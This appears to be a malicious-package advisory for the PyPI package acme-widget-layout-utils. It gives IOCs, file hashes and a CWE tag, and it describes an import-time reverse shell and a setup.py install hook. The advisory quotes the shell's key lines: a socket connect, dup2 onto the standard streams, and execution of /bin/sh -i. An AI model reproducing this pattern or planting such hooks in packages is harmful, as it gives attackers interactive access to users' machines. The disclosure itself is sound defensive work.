-= Per source details. Do not edit below this line.=-
On import, src/acme_widget_layout_utils/__init__.py executes a textbook reverse-shell pattern: it opens a TCP socket, duplicates the socket file descriptor onto stdin/stdout/stderr via os.dup2, and execs /bin/sh -i (lines 11-16: _sock.connect(("127.0.0.1", 1)); os.dup2(_sock.fileno(), 0); ...; subprocess.call(["/bin/sh", "-i"])). The hardcoded destination 127.0.0.1:1 is intentionally unreachable in a default environment, but the code is a fully functional reverse shell: any environment that has a listener on that endpoint, that proxies loopback, or that is patched to redirect the connection receives an interactive shell with the importing process's privileges. The package additionally writes a marker file /tmp/pypi_install_hook_marker.txt from a custom setup.py install cmdclass during pip install, and the package is published under a generic widget-layout-utils name despite its pyproject description acknowledging it is a 'pipeline hook probe' with no advertised utility. The name/purpose mismatch increases the risk of accidental installation. Shipping live reverse-shell code on public PyPI under a benign name is unsafe regardless of the author's stated 'security probe' intent.
During import, the package starts a reverse shell.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-acme-widget-layout-utils
Reasons (based on the campaign):
{
"malicious-packages-origins": [
{
"versions": [
"0.0.3"
],
"sha256": "42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600",
"modified_time": "2026-06-11T01:46:15Z",
"source": "amazon-inspector",
"import_time": "2026-06-11T02:24:27.554501614Z",
"id": "IN-MAL-2026-005357"
},
{
"versions": [
"0.0.1",
"0.0.2",
"0.0.3"
],
"sha256": "643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8",
"modified_time": "2026-06-11T05:40:39.931561Z",
"source": "kam193",
"id": "pypi/2026-06-acme-widget-layout-utils/acme-widget-layout-utils",
"import_time": "2026-06-11T07:49:46.172073804Z"
},
{
"versions": [
"0.0.2"
],
"sha256": "ff800752007d4e55ddc8172e04c8d75ac04d61b499cc58d97f016cd34d70d6c4",
"source": "amazon-inspector",
"modified_time": "2026-06-12T19:11:05Z",
"import_time": "2026-06-12T19:44:19.145502925Z",
"id": "IN-MAL-2026-006199"
},
{
"versions": [
"0.0.1",
"0.0.2",
"0.0.3"
],
"sha256": "b88682f3976ea35b55757e68f5e744aab7e1430ad10ec124d24e04c57f16395c",
"modified_time": "2026-06-11T05:40:39.931561Z",
"source": "kam193",
"import_time": "2026-06-13T02:23:25.582806199Z",
"id": "pypi/2026-06-acme-widget-layout-utils/acme-widget-layout-utils"
}
],
"iocs": {
"ips": [
"34.69.137.236"
]
}
}
{
"package_integrity": [
{
"filename": "acme_widget_layout_utils-0.0.3-py3-none-any.whl",
"hashes": {
"sha256": "6ac0e78622500c826abe1209dc38b736dc0efdbdf350de726cf61dcb7da7834a",
"md5": "f4295d1297c0cb74a638a3ad949d0817",
"blake2b_256": "38246aec6a745e8f7660a345797c632829f16c2f5b9bf30ea6ba2a19f9b11b53"
}
},
{
"filename": "acme_widget_layout_utils-0.0.3.tar.gz",
"hashes": {
"sha256": "58cea9e8965d0148962288648322bebcd4ddf5576169269981612a9c729bd233",
"md5": "5bd41cffddaf6808608d6875b0a9dc38",
"blake2b_256": "a2a54dc0b1fd6fb75fd5d3f0d66ff1e64cfd2f20f72d07e275683859946b26d8"
}
}
],
"evidence_files": [
{
"sha256": "611dbc535af11a1b91d66630e0f56d6a7a7174e74f46907fb8291d738448738c",
"path": "src/acme_widget_layout_utils/__init__.py",
"tlsh": "c701cb8bcc2ad09a5f72a1918061c068de57a8031b3818b2bdec53146bf302561b4932"
},
{
"sha256": "4ed96d4110ec206f50864acb834b2f11808cb903df3b39a876a3ebcf8fe66eea",
"path": "setup.py",
"tlsh": "7fe02646983f7070ad9383a488b346121c23c6605bf0e2a674fe1a715f931e6cc478c3"
},
{
"sha256": "1ed303a16226ddc822f2fb6d1d148805a1c09eb5577cfaa92220f7588902097f",
"path": "pyproject.toml",
"tlsh": "31e06823cb775965eac164446051a167cdf2e8d92dc0d85c8acfc9983cee0e9c6f8929"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/acme-widget-layout-utils/MAL-2026-5545.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]